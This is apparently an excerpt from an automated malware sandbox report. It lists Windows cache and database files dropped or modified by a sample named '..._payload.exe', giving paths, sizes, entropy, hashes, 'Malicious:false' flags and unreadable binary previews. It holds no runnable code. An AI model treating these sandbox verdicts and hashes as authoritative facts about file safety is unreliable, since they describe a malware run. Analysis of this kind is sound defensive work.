                                                                                                                                                                      SSDEEP:192:dkrzmBnok/BFA/nrg8pH7ZliETwOiqFE6zRPX5ZKRR9T4ot/y5Y5HF2:dkrArB0nrgoHyRqm6FPGj9NVHF2
                                                                                                                                                                      MD5:EB1E435C4E88F16A39AC43D4A5FBBA18
                                                                                                                                                                      SHA1:BD77E6D27F44759A7EC8B3B7A04D20474F8DF46C
                                                                                                                                                                      SHA-256:D415F5DB961B6E462A3F70878FD843857888F4D992B44865F422A67B24C9ADAB
                                                                                                                                                                      SHA-512:05436721C487228059A3C72309DDB4CA8F7060502F0EF3C58D08197E23C12FA1AD9FF82334707A6117E45D85EA2D2FB5181D2E001AEA75D07BE2812738E0B0E7
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:regf.x..*.........eME...!i\T#..0......q~..+.~*.,k._.1..\..<..A..Tu.?7.{.i..3<.j-}...M.W.C.2..s..gi.29.?$W.2..`.XP..(.IK.l.4..D....._9a...*.-....O.w...?.GI.{C..=..{.....5J..$...'....=s.d.B.a6d.v..;..4.o...i...$...o.9.>..ejYa@..] .C.k..r@.H`Z.&|...c...6..T..G.6.....x..j ....^..s@q.C=....g.A}..;.l.AB.s.\*.:@N....].db....u..I.sv.w.}V.4.$..%V,5x.........?.].{;...(.vH.v]q.w..zd}F..}"|3.c:.n8.a..mqx.B.x.7H.Yh?........L...`...'w#f....`..T..V.&..'.j..;.t%.5.....+..B.|].B..JA.^V......-..8e....u..m...T..DE.9..d.F}....j#....p.0w...YM..H./F..T....f`..n?6v.....$.u..Y..g..b?..Q..B..=,..R..w~|..[.D.....#2[./'....e.H...O.xnZ(. ..3.9G.gmB.....4]...NA......;X..T!..|=..L...j....K..'.......d..lli..@.9......X..F...S.W.....:.Q..6e.....R...D.0Up.m..[...$..axI....!S.YP....i..v>.......U...?.G....`.} ........Yk..@+,.E...T.N....k...K.6(......[...b...s{~j.Jd....}#......".R....D#..@'.PljL....,.......h.w..[.c.O...+.Z[.F.Js...<3..\.....]dM..x.X..]2[c..n..$.W.c.8..h.

                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.edb

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1573198
                                                                                                                                                                      Entropy (8bit):1.3302933189049717
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:HFDROauWF6//47h8AW/mkWmB+1dOwGjMfw7APn7Gkonr68jNNaJ0an:HKZWw47hjbxm+jqwfw6yLn28jq
                                                                                                                                                                      MD5:AE3A91C002A1E49208BC0B88059E2045
                                                                                                                                                                      SHA1:BD2E7C2AC3AD76B4F903C3538C1AC49DF83C3535
                                                                                                                                                                      SHA-256:3524422089DF46DB258F1700F4900D74B41FD1AC4235A7CE7FE27F2A42FC743D
                                                                                                                                                                      SHA-512:C573425234937CAC6FA335A6F3F27D08781D513335574395487F349D31953AF70C9C55DE48A5C577F38193B38B1CA14914C258B2C12DD125D4102207222AF006
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:..4t...f..F...o..y4!....2..U#%@<..|../...MD...#u..H..)....L0........0....+X.v...k.1.;_.j....O.W."........j.l......C..".P..._...0..........Bo...w.(J82.w..(....QM...oK..d.M.....J.|@..{.zK....s?......]..~...b...s.rXH(U.2.S....uZ._.(...R....~FM?}._v..Wrp....|._..N...o....7BT....m'W."...5...i,.pG.../..... .n..._b..GqW8...&V......P....{.O...cJ6.0!............V.,.b/].PkG,aNe....+.P...2...i..FV.C.& ..J.c...X;...^7.(....!......pH../....U.F..M^<.)......s....^Q.5._......y'_.g....BZ.I...?.z..#...1....Zb.'82..-{...........*...t....Kg.L..... .W4`.D....%F..&.p.....f..2......9.M.oZ^........W..z.3..#u....J$1\...TgZ|..tV"....K.0D.......#. .U.......e.x.3...4$...5.lP...C.r.pa.8s#..I....`.....Ks....Qu[bm.......1...+..+......7G<.......!.T...w.)v..$...).<.tQq4...L..+........1]7..."8.b....P...X.'Rq..+..R.c.%$....*.......>b9C...kM.{.....T..H,N......0i..~..HW...G.}Qu..0..I.`...G..(.se..S...J.`.....Q.H...?..O.....zsx(....i...@....r..'.....T.$...R..._.LUm;.}

                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.jfm

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):16718
                                                                                                                                                                      Entropy (8bit):7.989410795310843
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:0jgd1idz5GXTJaE1eBQrhUQVFpA8GTpxqyxiw709AeEMu3krT:lidtGXTJaE1g4hjpA80xqyxOSnOT
                                                                                                                                                                      MD5:BFA70448F15CECC78D09714614268695
                                                                                                                                                                      SHA1:CA268474F9943F54B8987F5EB1D9E39868C12763
                                                                                                                                                                      SHA-256:95D999B66DE69374A89C5E7A84967132697D24A8423A688009F2DA67434167D2
                                                                                                                                                                      SHA-512:B0D392A9F36EDB2CDBED39A52CB96C62A0E1E5DC4C96DAC5DDC427DD90F4B0F9E4B68C82B187375417BF994549B828FD9F19D76D41155C90086251165B83F250
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:..}.....\#..>o...'P.p...QE.._..{".)...J..;$[)|.4..UHN..P..6...4..*WG.h5......L.')....d. 9Ni%......K*.m...Uu...V.e.p.d..!!.U....o4Y..S].4....o.. .q...\xP..]...[..u"9>..#sSx..s$.H..$8r(.{.m./.~...A.}..H))...................r.-2|7^A..8.v&..Y?.T....r..\...f..(u.F....n..f]-.XS.....xCa.O.T..*.0B...:...(..$..G.h,.>..|..s.jH...|E;..RT..^...E....a.JE...C..q.....Oq...A..ad|<RR.x?w......l..C0...-\..j..[.H....b.F.S..5Vh!...O...V.@.*....]%...m=........e.>R...|gg....l.!......M'@.p..1wb.D.....N......VS.c....pPm/..%O.#.5.0........I..T..s....@ha9{=.Y"O..6.(.......B.U.-....,`.b.O.K.^..a.%..:}.p.....-.a..:.h.c....b`Z.&)-.fX-;...,.H....Lq..?(.,CP.,.i3..w...6b.FP.[...=........m...L].....1G..J.e...8tT..x...g+..[....*...!.s.|...9..eh....=......9,.C#..MQh....[..A._...z.Al.v....N(...N.7)Z.......3.P.....w.{{....4E/..}.P.c..74...p.M2.Vq..{...WQ..h.W7.|..v.U...N..}B..C.d.(......m.TQ;.3.Z.HV.....,.\..0s...Gb..Z..7".x.H..G.Z.W.e..\.%-...fp...F.8Ej..E.

                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\778a09af-71b3-49bb-83e6-36722d62514f.6dfb6b5d-10db-4868-b4ad-ef207a2dda1b.down_meta

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1726
                                                                                                                                                                      Entropy (8bit):7.887945267542132
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:B5iIKxi3aasYGwTO7uXNTfU5eY4guXAlcM/2Yv7yD:AiqazImJ1YJuX6ckk
                                                                                                                                                                      MD5:854180ACC2EA4A59695E4F861C63BE9D
                                                                                                                                                                      SHA1:94E42BFAD431ECEC5D8778A886476823919D822D
                                                                                                                                                                      SHA-256:F73A3357388E0B2C3611F148A65B3C9F7CFCF2289FAF95A433613065D288D333
                                                                                                                                                                      SHA-512:A215A4E1FEB4FD6B83F383681480A3907751120A32D29A4296A7C9579BB3C241E52C6037CAD7CE76658D8DB4CE16597DDC176C0AFEF5659290939D353D6FABDB
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:h.t.t.f..`.'....`md..k..E...~i..M...2.'`|..{..PI.G...JU+......M..":).q..\.@q....2...4..[...+..... ..C..3..x.N".f.....r.Q..\ .p..{TN.Ac.N............h.P...m.jhn..}[..p...a.G.+..?..z.`.......IaHlz.B%.aB..$!.Xy...fu..Y..<.../.....W..1..Wn0....T..&..7e.%D..6?.i:l..N..X.......w.....S..g.5.u..Q;d.]......:.6....N......(.K.....L.w.'..|...J.0o..][=.../..F...G]..l.q..$.......[.....7....\.7.T.....t...U.Bw...e.L...zH..J.d.d*.....E..a{......i.........<......Z..0HC.q.0S..R...#*.....h2...).2..Pw...v.W......W}L....x..L......kJ..yq*.A.....*.I0..../...C..@8.n.=Z...4....H..........G.[Ew..&.i.R.J..>[.F.P.8..IMt._....&j.r`.%i...5......?%... . .M.o.....?.E..T.]...j?....Y.i..F9dU1^z....pd.2;r8..F.i.zh...H..\.;H.....n...G....<.U.......K7p..G;_.."N.`.)t4.m$.4.`K<..D.f....t.....$Q-..V>.g..Gp....j$...z.Ig..m. ..v.Y.MB$...7L...K.T[...i..bl..j../....&..a.2.;...`.\y.h......cUe0..pi.y.L.u.].U.$.....b..=...L^?..^.Ux.aN.0..sr............M.....F....P..%.e..u..S....@...O

                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\778a09af-71b3-49bb-83e6-36722d62514f.up_meta_secure

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1092
                                                                                                                                                                      Entropy (8bit):7.781103963362092
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:R5x6rwyJFYGib/sa24qbjWLUDRwOXrVpQwww/aJSYCs9hBpUnG2bD:x6XYXga24qPWLUNwOXJ2w/+1CsjBmnND
                                                                                                                                                                      MD5:94E2333EB477C4BBC9DA55698BA5B275
                                                                                                                                                                      SHA1:6868E710F2A9259461D91EB688F19FF0449B7CEB
                                                                                                                                                                      SHA-256:1309FF2E5F8B83A00C0D04A41A22AC2305D684A9D6ED95FA0C91B856B50DF8B9
                                                                                                                                                                      SHA-512:0FA3E494A29B96AF72E0E9D67F52BB1D56B26D69D1F11B644DDE85708E8E661B92026CAF931162DB2D5F24C7DDADFF34EB2C7FA5D3819E2F490433F9635CD2A1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:......."k...f.L._l.../#K6...@x_).J7C.K.y9'.q..6{.xg.k..^`...4...X[....g.&....... .'....D..DK...}...5.Z.6.".aS.]O.D.w..I.....8.5....U......^.\ %.F.E:....M.-.+...Ef.E%.Rt..LjJ..H.[...k...).rb..L&Y.^4.w.+V[...q.v..........PX....3knN.T....W..Q.....<.65..(m...(Y.I|p....3...n.v.SF9.....y....O..... .......y..?.Z.ms...m..;.. ...o...a.gA.?......(..m....1f......~....@..4.}.+.....{?.&..*S.i.!R>0|-.3[...35.m...T!h+.w.{.1.6.{.K...D....U.H.."..... K.0.6XX..p.s}H..`....r.z.LEQ..a..:.P..\.....TH4.X.n..pcL.WJ.G.\@fO,T..m.u....6r.....?-...H..#...8X3.H..|XP..p...K....&../V...,..{.E&~...2_E..v..&..{!...L.?...q..(4hS.R.j.M..@`..=h.z....Pp...T..j.$..".$.[......[.Y.q..yj.F.C...P7h.U_L..6.u.F=..4.*.5V........S_<.B..|..h#s.Yvq.t.k.$..y.9.I{.Q\.8......ec.q0...g...\.U...N.c..9;.45.8.......yD.....Sn.1....m.....0.\.w..29W...6...Z......*QE;.o.$:....l...E..].{.8.^..0.F2l...8!.A,^....s.Q.9.+.Q.Mk.w..}..xD...ol.'.],q..7R.x....U...0Z..?./..s...D7R)......;o=z...?../NW1R8[[B.D

                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.edb

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1573198
                                                                                                                                                                      Entropy (8bit):1.3192798759517346
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:FuqffEy4OpFqTwdgLCnH6QC24US2uDNrY2lPcavlaPa3:0lyHFRdEpQrn5MNrYrkV
                                                                                                                                                                      MD5:974D67545E36B6107A2C83E42BF367BF
                                                                                                                                                                      SHA1:0550954BEA1AA284AE94EB8B6CCA6E0FFEB790D6
                                                                                                                                                                      SHA-256:A78A9E01930E1AC0643E879219DE38071F1E4D514E90D1712122286E434A038C
                                                                                                                                                                      SHA-512:E152CD5CB63FD5666A65B0128CBFF87A99D562198380A35F4285D35661B20E0062F5C0F17F416D678408C8458F24A769EDA61FC2A45CB362E0D1A8CA70811B6E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:./...-xZ.....U.J........~.^.......E...d.S.\......t..-%.ny.Q.....8...|.'...........p.t.%.....Wg....=.H5W.#Id(.K.r.z.n.&g9..!.......w...T...t..(S...(.5.v*V.).G..[{$...s..-.....X0...T.F....T.h3.....e...'$..2z..".A.....$~..GZ..fS..:.........IIV.%........Hggzj...y.....?...&.7..k.2..j.....L..6...2.ki5......e..o..3]...b.v..c.^TRm..i.....@[.......%.......'......%&=,l....../"..K).(S..?]t.^....s..#G...S<.ESo.....1.lX..K.o..J;...<..4e..eC..\.....A.d.e<.6.>.^..~.E..d...g.C=..]j/FJPD//.y.v.Iw..f.w5UE.O..9.....@.&...,.....Q..G...:u2...v@....W.L.K.9.........>&i...tL.$+P....$.[a.q.l.QF.v........bL......?.IL...............d..J.}...E%..L...0.h.gTU....V;EL[.l*P.'co.y........D....v 7....Jf..Cd.A...)....8.V........c...n!..../=.m,}.....-C`....6h....)...7TY.........#.7.Si...$.m`...J.O.{.M.)...P+.[_Dc!..].b.|...yN.mE...Kxg.~.k....YA.jy......:.....s..@...3M...y...;.!....)HB.i9.H$1X<.....!...Ou.+....(P..gZ.W..t...............-.\D..'.f.....-....L.k.0.g..

                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.jfm

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):16718
                                                                                                                                                                      Entropy (8bit):7.989013370452438
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:vzvaf812zHhP4hZsrQLbstCVOovUSQ8ia5ZUS+E+ZkEO/p+Y70BAhQtf36h+:vLakQ94orQLbs8Vz55OE+Z7q0BU4B
                                                                                                                                                                      MD5:6EB2D498D8B6A2D6388868E23443E435
                                                                                                                                                                      SHA1:B80C20D243FB358CC2E4FCFBD96955C07F8BBED8
                                                                                                                                                                      SHA-256:90CDE8C8334767B4AA7E59111815B9183B7597C6134AFACFD9F6945E362AE528
                                                                                                                                                                      SHA-512:84D279D46B97D7E7E463061D5AAD636CD6B82B52CF72079749FBB92CA4E4A292C810E351F9B909D5AA41BDBC301715477D946BCA0FBE5245C949F259AFF591F7
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:@.v..n..{O....U@.. .,.5V.f{..;R...v...w.Xc........~\9..X.D..f...e..-.P.^..Mq.v..^.Wd..`..ED.r..Ny`....*o..(.I.F....L.z...u..k%i..5./m)hY.qI1N...\.._...H...Z8.../..by........j..M.J.-..6....r....=......R.H...E....2,^;..G.`T.w......5.3j.@...2O...,.cR.f.~h..).2.......:S..w....U...uju.OX.[a.v...KF.F...5&WeF..4)1.UQ"\r.~.`.....5.......} .?.0....,.+......S.+b.........:.......Dx..I..3u..:,.Y7.R../..a. .Y. ..>...9.8XR)...C_.@..M>..r...3....tW6.L.WT.f.c.....t..$..s.K'...Cy..^..?.{...:..6.e.......7..'.a_X3.X4&....e3./d.G...[........)N<9E..Bf..r.;.%.#....}.yn.V.C.n..B......).5.T.n .m..%d.2.F.S...V@...V...T.~....<..../......&.m.&B~.y....)....*..S.....j....h<........6...C.G.R.w.....7#."..,..O. .n.d....e...E.......zK.8.....hH...oP.`.k..h.......w..*......OL.3.. ..._.....}^..>j..F.R\.bzA..H.`....{..8N...d_0bOj$l.j..X...e&..72Ol......)o$.'u..*..-".....F&.P;..]..g.i#u....0.8.c..3.|.....F.......':.(.}q.......m..-.......~2..r..".?...0.M7_...l.C~.......r....

                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\Indexed DB\IndexedDB.edb

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2097486
                                                                                                                                                                      Entropy (8bit):1.113404845964692
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:VLGttDlSXDIZMF9wNKggE19ppNusb6H/EM7m162ZbP+XkMYBfwaxDfax79:VLiN2WMMDpLaH/EMKVRs9
                                                                                                                                                                      MD5:9564DC1EF7697AB291ABB7A2950F9439
                                                                                                                                                                      SHA1:23DFB9AA59CC9728E3ED903A5641DEA18C9DA958
                                                                                                                                                                      SHA-256:73CDFB2F753394EEC399644E85E22A80E24C6C416DA352BE55E07E86ED12DEDD
                                                                                                                                                                      SHA-512:66F42FA4C89D1845437BB25824B5617B30DD4EC6F328599A96E3A1AE64F3AC698FE69EFA012D3D6057FAEF151B65BE9E98659C229B663C70DB89060A9816CB86
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.......{..a'.,Y...M....g..&-.#....xv.*..J...g.y..n..+..0...PF.?....'.....8...X....\.#.......C|.... ...5.......K...T.t../.Rf.;g....0.B."Z......]}i.zr....../....&_.8..1....{.;#.<.r..X...2..........X...G.:sX..b........8-.{...('Q........;o..|;...'.o.m>y......b........O....'.<........4.T.2sf..o.E.......HV.....E....b#.}v..^..[2 ..].u.WW...D...\Q=.....G....:...%_....Q..i._..p.|........Y.......(...#.(Y.P....<S... .*.*..}W........'.A..]JY...Tj............#..@.m.h...Jh*4.au....;.......*........R.R.... D[=!.#{I....S.t..~.R...j.Y.&u...OTn.$..2m..c..e}..,6..).<..d.....^4.+......_.6.m...b.....1_'..!B..y..E.7.....r.D.5...")...c.vx..}..5..d.........5q.......I.`...z.....8.....,...,...0.On1..#..3_...TFoDG...3.l..._..z....$....cB^...........\.FYKH..V..(j>..a..R..d.V.$#$-ql.J....%.q.N.........5..]..D..M.$..'kNIX]..9.s...d..M+.."..`b..B....|p.R....?."."{.S..8..$a.n../`.L.p.C=...J...?.....H0...u...EX...1E.*D...0.,.n../..W...Bk.......r@.*T..*.....h.=..

                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\Indexed DB\IndexedDB.jfm

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):16718
                                                                                                                                                                      Entropy (8bit):7.989183604378393
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:QuQnurwH5osV8PhTXf7NldnPYS50W2dhYO1g7HRImVXRj6QJC7ezT9Atp:Lqur25jO9pHPYS50W2QrNNXcmGevmz
                                                                                                                                                                      MD5:A5CB5A5E77736008042422F289D6A0F5
                                                                                                                                                                      SHA1:E478F6CFEA2A4387A50E05339152379EB8449209
                                                                                                                                                                      SHA-256:B2381DB5F2E5BDB4DA6846553BE06BEB56BB2697C228A8B2B31AD6BD5E02F0EA
                                                                                                                                                                      SHA-512:9FFECD4569D60688CBC286218D223BFA64C6F87217075E42012F76F40E61576F3D6D44765060685E2B8EE700B90AB44725DAAF4A88E634633BB4586A69898A1F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:..l..q...a.....i..mN}a.../.].>...e..n.....fl.L...f....P...U1 .0XP..Ed5....E...2.vD..Bz6...U.F..?_...C../..#r-...a3..x.6...0....Y..g...h.tx."[..p......8[.....N.a...+.r..l..l..n4.W..B...`.QcY.y........m.e...tr.W...j..4A2..&........L....?c.d|.p..3..]..I..^...<..h..Jk....-....W....w..q.&(C...f....3#....f...n.^..J.L...?MQ..... (....R.%.j....Tf.>Y...9CG.#6...5.FH.6...[.....p...e.....X1...`.P...S..(.....?...%wm......?"_.8[......Wef...]..p..\.~..~.g.?|..0.Yt...r.._..qO...N4sH)m..#Z.0..hk...x7....(...d..{.f.....X.I...3......W.f.)....Q.B.C..-.[..Fg...I.....3IF].6.BX<...f.....N....{....~...?.u.<s...[...J..i......3zO|p.....BQe...6........P.(L..,;R..8V....:U..P.Nr....7..r....pM*.F..kJ.....T\b.L..i~.5.$n.[.tb+|.....xQ.v<....RO..%S0.K.e..lj...X.~....=...=.c2H....J...f......oG.H..G.....{..)..c.........l...hX..w....1K.O...0n.Ys<:..%.AO..q....~.+(\.z..9.|.........i).+d...m.G.w..!`.a)..........Q...R.m5.z9.}`,|j..)4.\..*^......sn8.m-..U.`Nl0.j%..rJ..X..2

                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\Indexed DB\edb.chk

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8526
                                                                                                                                                                      Entropy (8bit):7.976602656486461
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:7k4ZrKo6roenG4IZNwA7EKW1I6jo+vQ8CDpbyU7u0fqj3Kx+jbrLql4:LRK3HnMNwA7A1pE+ahyRfK8u2
                                                                                                                                                                      MD5:BE41C406DBD13E19454413601EBDF2A1
                                                                                                                                                                      SHA1:A20C4D740B66E38E00C0B9F5D5B1D9DB99687C89
                                                                                                                                                                      SHA-256:92CA9F0753AE41AEA3B9B0E0B9BD4BEF766417EA8D14A8E9FC16D88175576E8D
                                                                                                                                                                      SHA-512:60B1CF498F824408396D7F8E590200498298B9C5A0B9B668790775AAFC8038705BA6AABD154B1565445D420A004250C0CB9B1D670D7B9E03567E8A5FE033487F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:6......&....^.w.5(.}..t....:4.RW`{a*..y...-w....U...HhO`...b.#."r.KJ...B.....r..~..R....\\..$..O.C~..`...=.{'!.. ....;+..w%.i.3.P.......2Fw....S.M..!.^.y.w....."....A.~f.c...4Y...#..RD...K.......mX..E..Y:#./u.y..KE.....Yk....q8a.....58....y...]}..$..8.........Ri.R-......^.P..pm..'.'?..........uC.3U7..N4\`..8.rd......r^.d../.|%_......<..Y#}.(.....-8n.lY!4G..w......%.^E..2..6..N.B;7u....ka....4/J...N.....f..C1.Z..[~=._.u.......8n.P:0|..2.+.e]3.....K-.?..K.9.;..c..H#...j......7.1."....3.+,w.j.4W.j.d.......AKs$t..A.K......n.q....b.Y...`.mZ..."...Wm|."..M)..&.I.J.\........Y..3..Y.!sZ$.y.8.y.R..~.........qp/C.g....].&V....j............Q...h!......S'...._#.|G..;....N..,..,....{.5.?^ `[<..w.......1...a7|...K......5y.......V...\..#...#._...K.....'?..p..8...o......B.. R..7..uU7*....n....4.......D..m.H....D...IC|d........(4f...;.Y..P5.+.5w.NL.y.C..'.c.=..R.f..Vm..X.d.@.s..pc..j,_...w...mtj\.. F..d....b.R.t..A.....SB......l9.{I...Z..{...c..Y....

                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\Indexed DB\edb.log

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):524622
                                                                                                                                                                      Entropy (8bit):3.2079948765000403
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:S2WfvbmBeBM/hY27QUYGYfIfUE+MqLIQp4Uz6i4V3Dp/T9G:Sr3CaM/hY2cxhfIfKpyUzJ4Rp/xG
                                                                                                                                                                      MD5:35166C287A02627AEBD3A1DF7D6F13B8
                                                                                                                                                                      SHA1:A39BC70CE2E72ACF028A9954657C096543D8BD08
                                                                                                                                                                      SHA-256:ED955C58DED281C763B84CFB1041F90FE30E52CE1E1552ED48A78C6E6E11A10D
                                                                                                                                                                      SHA-512:8044459941C51FF1AF2856C0D70FF01024C46654D5C34964B12C21FB9EFB3FEBE1A13715F770B5ACCA0BFC9708DEF4049F50137667EBB5F1C4A147FEBB2CD3D0
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:u.,I.i.B..0aH<.?2P.zE..-.....=kn.#..\G<.`.85...)N...p...h..m.v..^>I..=..-[u. ...{........2.B9..!=....z.PgLS>j$Q.k. ...s..F..)"S.....uG.......:..k.B..!Yu\`..lM.....a.fH..*<[.8....g.[.......[. i..wf..N...!..>d..+...R..:~WC`h... ....}HK..Lq.F..}Wn..>.......A.;.)...:..^{.H.n....f%w...yq...2..S.......1......N.m......7.V.i.[.-V.H.....d..WK..f........#._....A..,..Hmq..Ez....D.....T....Y..'...|.G.....n....M{{.^4..6$....k.. .2.......[.;?. 1..m...P......70.'g.s.w.5...I0..S...A.B)k...#TR...#...../...Z.....1M.&.=..b+....?.@/...d.....?aQ....OO.R.).G..e.B..S.32v.....UEL.....Dt(6..'...]H.*&...Z....0Be...v........\.w.c:....W.:...A$.K.#&.....SB..a....TH.3,..a.7..f.s....?p.<....H.....uN.5. ..?....b..........E...D.6(.o[...uN..@.)w.u.y#..C.t.+.0C...2........:.UN.+Oa.a.......j...!..,....I.......M....O.WH=...Cw..\..\.'..Y...(..nR...q@.k......H=.*..A...n2..N{9B..1.[I.F....@......o.....`q.....6.h..u.....^.G....8I)u.j.BE.x.......V|:.R...c......S,...Uv...N.

                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\Indexed DB\edb00001.log

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):524622
                                                                                                                                                                      Entropy (8bit):3.5014647047041105
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:qkzJzzAM92026MuOgHWHUdU3REGQ31Tgrj7/MbFjBA9Cfl4+30ZxV8aNcmul34t:xJQM92/7tuJlcrj7/QFdE0l10j
                                                                                                                                                                      MD5:DF97E02F433E5D3FC55694FA07842D24
                                                                                                                                                                      SHA1:0D4C9AA461973536911F49CF1BD2E2DC0EDF5656
                                                                                                                                                                      SHA-256:7FA895B92693D0496777CD0934235114C32D8509AC81109A899F7E4F931B7954
                                                                                                                                                                      SHA-512:DD033CD100FC91F61B0B64A72ACA46EB9E725D38CCB1A750E7CE31DF0073C5614E07176C0854A21699C2B0146C10138CA52CAB9E0120F9F2FA282809A2598559
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.....r.v......>..........G.....,!.Xe...)!.IZ...%.u..&..o.JX}wX./.J!.K.?..-...E.z..h.W>.B.[G...u...m._....?&.aL.8?..3..Y..Q....r..zRPF.e-H..6t..........2.>..D..H./.....[.V...^.v......7.N..$lpW.._.(...e..N]..W...h..)..$$..g..dZIY..e.>.R'..E..a...q'..oY......g.f.......sZ..E....`.+...]}?jl..j..%n...:._U...l..w.t*y1)...)..I......E..B.c6M...`o...X...VF).f...P.`_j28.\/.3..(.;i]..`?>]...}K..)....o...x..'.u ... u.Yt.).[....j.........)...\e..q. .U0._./D.^.*.5.9...E..........cr.................?..H...=x.P(..+.cj].y.g.......Vud[g.>.lc.=,$d@.~.T.)...0...].~.w.8.KCU.. ....s/.4....\W..C...*.C.-......5.Pi.`=....8.h...q...O..{=V]am.u0.2..........k:.{.....>..u.:WwZ.}'.....!......S....?............I....y..r.K..M."...z....[.......ZA.v"o.q....].. .....E.O:...mst.....!....yX......a./....C..Y..ul7..R"B..9=.V..2!..........y.5.n.T.`......@...z.r..%......>N+S.t....wJ|..{^O:..JYb.i....F...>.......o!a@^qx+>..*....A..K.......L#...............,h..*....xzb@8.a.f..>.

